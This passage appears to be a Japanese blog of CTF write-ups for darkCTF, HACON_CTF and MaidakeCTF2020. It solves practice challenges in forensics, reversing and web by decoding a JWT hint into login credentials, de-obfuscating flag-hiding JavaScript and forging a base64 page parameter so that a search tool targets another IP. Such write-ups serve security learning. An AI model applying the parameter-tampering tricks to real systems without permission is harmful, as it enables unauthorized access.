c:ElementID="cd19d754-8634-438d-adc2-39add8e4f486"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P">
<c:Notes>darkCTF{</c:Notes><c:CreationDate>2020-09-20T18:18:41Z</c:CreationDate><c:Extended xsi:nil="true"/>
<c:ContactIDCollection><c:ContactID c:ElementID="39dc2dd6-932a-4e42-8054-6bd4ee416ef7"><c:Value>179051fe-a6a8-482f-82d2-fa01da089eb1</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="cfec7706-cc34-45c6-b23c-dafa90875aab"><c:Type>SMTP</c:Type><c:Address>dealer@deal.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="f56e2a64-dc23-46c6-80c7-31f611b7d826" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="82475264-1dd1-441e-9677-982340b03760"><c:NickName>dealer</c:NickName><c:FormattedName>dealer</c:FormattedName><c:GivenName>dealer</c:GivenName></c:Name></c:NameCollection><c:PhotoCollection><c:Photo c:ElementID="6161866f-3474-4f24-90f0-4ceb0cdf8634"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P">
<c:Notes c:Version="1" c:ModificationDate="2020-09-20T18:19:52Z">C0ntacts_
</c:Notes><c:CreationDate>2020-09-20T18:19:12Z</c:CreationDate><c:Extended xsi:nil="true"/>
--
<c:Notes>4re_
</c:Notes><c:CreationDate>2020-09-20T18:19:55Z</c:CreationDate><c:Extended xsi:nil="true"/>
<c:ContactIDCollection><c:ContactID c:ElementID="02ee3bab-2304-4bde-a376-0f40f80c0051"><c:Value>86f01396-7858-4557-af4b-e2b72a8e6c04</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="426bea23-5a44-44be-ae68-01e63426ceba"><c:Type>SMTP</c:Type><c:Address>become@target.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="38fea789-296a-4f28-83bd-604fc31393de" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="02b5a5f6-0808-48e8-b00a-30742e6bd9d4"><c:FormattedName>target</c:FormattedName><c:GivenName>target</c:GivenName></c:Name></c:NameCollection><c:PhotoCollection><c:Photo c:ElementID="459674de-9a96-43c5-8756-568b77c24e7d"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P">
<c:Notes>1mp0rtant}</c:Notes><c:CreationDate>2020-09-20T18:21:20Z</c:CreationDate><c:Extended xsi:nil="true"/>
<c:ContactIDCollection><c:ContactID c:ElementID="5463de33-f055-4ac1-bd71-3f01dba6aa73"><c:Value>9a1aefae-e90c-4f6e-b0a9-a9dd8d3c4e6e</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="8b067d8e-213f-4378-8217-3d8236263eed"><c:Type>SMTP</c:Type><c:Address>give@money.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="c4b57a23-9bb1-40d5-9313-a744a90b9699" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="1e01cb11-0111-40c5-8fbc-b56b95b8104d"><c:FormattedName>Money Giver</c:FormattedName><c:GivenName>Money Giver</c:GivenName></c:Name></c:NameCollection><c:PhotoCollection><c:Photo c:ElementID="bab69971-9f93-4764-87a6-1a8722bf4c84"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
regf
{qrmtmN7
OfRg
HvLE
darkCTF{C0ntacts_4re_1mp0rtant}

Rev

so_much

渡されたバイナリファイルをghidraで適当にみていると

f:id:tekashi:20200926184853p:plain

get_flag関数でflagが生成されて比較してあっているときにそれがflagとなるようです。

最初7を引数にflag_48という関数が呼ばれていてそれ以降は引数に+1されているようなのであとは頑張ってflagを組み立てました。

┌──(kali㉿kali)-[~]
└─$ ./so_much {w0w_s0_m4ny_funct10ns}
darkCTF{w0w_s0_m4ny_funct10ns}
WoW! so much revving...

HACON_CTF: Write up

CTF

Web

EAsy WEb

f:id:tekashi:20200925141007p:plain

ソースコードをみると

 <!-- <script>
        function myfunc() {
            alert("1");
            let uname = document.getElementById('user').value;
            let ppass = document.getElementById('pass').value;
            //console.log("uname = ",uname, " pass = ", ppass);
            let data  ={
                username: uname,
                password: ppass
            }
            console.log("data = ",data);
            $.post("/",data)
                .done(function(result) {
                    alert(result);
                })
        }
    </script> -->

uname:ppassでログインできるようです。

Okay, here is a hint for you -> eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImtleW1hc3RlciIsInBhc3N3b3JkIjoic2VjcmV0a2V5In0.oJOVw-DOUGSNjGDRWe5_kZm3MAFq_Y9YZa0QyXDbvlM

と出てきます。

JWTなので、jwt.ioなどでデコードします。

特に署名もないのでそのままデコードできました。

f:id:tekashi:20200925141145p:plain

{
  "username": "keymaster",
  "password": "secretkey"
}

でログインすると

here's your next hint -> syntsvyr

と出力されてとりあえずROT13で変換してみると

flagfile

となるので

/flagfileファイルを見てみます。

<div id="something">HACSEC{Y0u_g0T_I7}</div><div>

Misc

MISC 2

$ cat flag*
HACSEC{GoTCHA-AgAiN}
HACSEC{BetterLuck next time}
HACSEC{Youare too noob}
HACSEC{RookiesHEre--Huh!}
HACSEC{GOTCHA!}
HACON{naoo}
HACSEC{NOPESs}
Hacon{notyour flag}
HACSEC{z1ppppitnice}
HACSEC{Flag is not here}

MISC3

$ cd zipv2
$ ls
0     1     2     3     4     5     6     7     8     9
0.zip 1.zip 2.zip 3.zip 4.zip 5.zip 6.zip 7.zip 8.zip 9.zip
$ echo 1..9
1..9
$ echo ${1..9}
zsh: bad substitution
$ cat 0/*
HACSEC{Flag is not here}
$ cat 1/*
HACSEC{GOTCHA!}
$ cat 2/*
$ cat 3/*
HACSEC{GoTCHA-AgAiN}
HACSEC{BetterLuck next time}
$ cat 4/*
HACSEC{RookiesHEre--Huh!}
HACSEC{Z1ppv2}

Networking

BAsic

IPPSは631番ポートが使われるらしい。

MaidakeCTF2020: Write up

CTF

Web

爆速

f:id:tekashi:20200921220925p:plain

get flagボタンを押すと一瞬でリダイレクトされて戻ってきたのでプロキシ挟んでburpでみる。

f:id:tekashi:20200921221012p:plain

MaidakeCTF{Kirito_is_said_to_be_able_to_go_720km/h_when_he_uses_his_sword_skill}

低速

f:id:tekashi:20200921221031p:plain

リロードするたびに値が変わります。

これを表示してる部分は

<p class="text-center my-5" id="flag"></p>

だけなので、javascriptをみてみると

function rot(str, num) {const _0x57c5=['map','join','split','call','charCodeAt','fromCharCode'];(function(_0x2715ea,_0x57c505){const _0x5c66c7=function(_0x36a3ac){while(--_0x36a3ac){_0x2715ea['push'](_0x2715ea['shift']());}};_0x5c66c7(++_0x57c505);}(_0x57c5,0x74));const _0x5c66=function(_0x2715ea,_0x57c505){_0x2715ea=_0x2715ea-0x0;let _0x5c66c7=_0x57c5[_0x2715ea];return _0x5c66c7;};const _0x2feb07=_0x5c66;let i=[];i=str[_0x2feb07('0x0')]('');return i[_0x2feb07('0x4')][_0x2feb07('0x1')](i,function(_0x36a3ac){const _0x25d8c5=_0x2feb07;x=_0x36a3ac[_0x25d8c5('0x2')](0x0);if(0x41<=x&&x<0x4e||0x61<=x&&x<0x6e)return String[_0x25d8c5('0x3')](x+num);else{if(0x4e<=x&&x<=0x5a||0x6e<=x&&x<=0x7a)return String[_0x25d8c5('0x3')](x-num);}return String[_0x25d8c5('0x3')](x);})[_0x2feb07('0x5')]('');return i;}
const _0x32f5=['forEach','floor','fromCharCode'];(function(_0x8b6703,_0x32f579){const _0x55c0f1=function(_0x213f5c){while(--_0x213f5c){_0x8b6703['push'](_0x8b6703['shift']());}};_0x55c0f1(++_0x32f579);}(_0x32f5,0x16c));const _0x55c0=function(_0x8b6703,_0x32f579){_0x8b6703=_0x8b6703-0x0;let _0x55c0f1=_0x32f5[_0x8b6703];return _0x55c0f1;};const _0x3d349f=_0x55c0,rgrigrjar=[0x4d,0x61,0x69,0x64,0x61,0x6b,0x65,0x43,0x54,0x46,0x7b,0x44,0x65,0x63,0x69,0x70,0x68,0x65,0x72,0x69,0x6e,0x67,0x5f,0x6f,0x62,0x66,0x75,0x73,0x63,0x61,0x74,0x65,0x64,0x5f,0x63,0x6f,0x64,0x65,0x5f,0x62,0x79,0x5f,0x79,0x6f,0x75,0x72,0x73,0x65,0x6c,0x66,0x5f,0x69,0x73,0x5f,0x61,0x5f,0x63,0x68,0x61,0x6c,0x6c,0x65,0x6e,0x67,0x65,0x7d];let frgtrghgdtha='';rgrigrjar[_0x3d349f('0x2')](_0x213f5c=>{const _0x305999=_0x3d349f,_0x222ace=Math[_0x305999('0x0')](Math['random']()*0xa)+0x1;frgtrghgdtha+=rot(String[_0x305999('0x1')](_0x213f5c),_0x222ace);});
$('#flag').text(frgtrghgdtha);
rgrigrjar=[0x4d,0x61,0x69,0x64,0x61,0x6b,0x65,0x43,0x54,0x46,0x7b,0x44,0x65,0x63,0x69,0x70,0x68,0x65,0x72,0x69,0x6e,0x67,0x5f,0x6f,0x62,0x66,0x75,0x73,0x63,0x61,0x74,0x65,0x64,0x5f,0x63,0x6f,0x64,0x65,0x5f,0x62,0x79,0x5f,0x79,0x6f,0x75,0x72,0x73,0x65,0x6c,0x66,0x5f,0x69,0x73,0x5f,0x61,0x5f,0x63,0x68,0x61,0x6c,0x6c,0x65,0x6e,0x67,0x65,0x7d]

これがflagっぽくてこれをいろいろ変化させて出力させてるっぽいです。あとは、asciiコードに対応させて変換するだけです。

MaidakeCTF{Deciphering_obfuscated_code_by_yourself_is_a_challenge}

社内用検索エンジン

f:id:tekashi:20200921221654p:plain

適当に検索してみると

f:id:tekashi:20200921221714p:plain

ただし、

https://aokakes.work/MaidakeCTF2020/shanai/?page=eyJpcCI6IjE4My4xODAuMTA1LjMwIiwidGFyZ2V0IjoidGVzdCJ9

のpageで指定されてるbase64エンコードされた文字列でIPアドレスと検索したい文字を指定しているのでaokakes.workのIPアドレスをそこで指定すればいいと考えられます。

$ nslookup aokakes.work
Server:     192.168.2.1
Address:    192.168.2.1#53

Non-authoritative answer:
Name:   aokakes.work
Address: 18.177.12.46
$ echo -n '{"ip":"18.177.12.46","target":"test"}' | base64
eyJpcCI6IjE4LjE3Ny4xMi40NiIsInRhcmdldCI6InRlc3QifQ==

これをクエリ文字列で指定してGETするだけ。

Misc

SVG

$ cat flag.svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:cc="http://creativecommons.org/ns#"
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:svg="http://www.w3.org/2000/svg"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
   sodipodi:docname="flag.svg"
   inkscape:version="1.0 (4035a4fb49, 2020-05-01)"
   id="svg8"
   version="1.1"
   viewBox="0 0 1058.3334 396.875"
   height="396.875mm"
   width="1058.3334mm"
   flag="MaidakeCTF{SVG_images_are_composed_of_XML}">

焼き肉W

適当に押してたらflagがでたのでよくわかってない。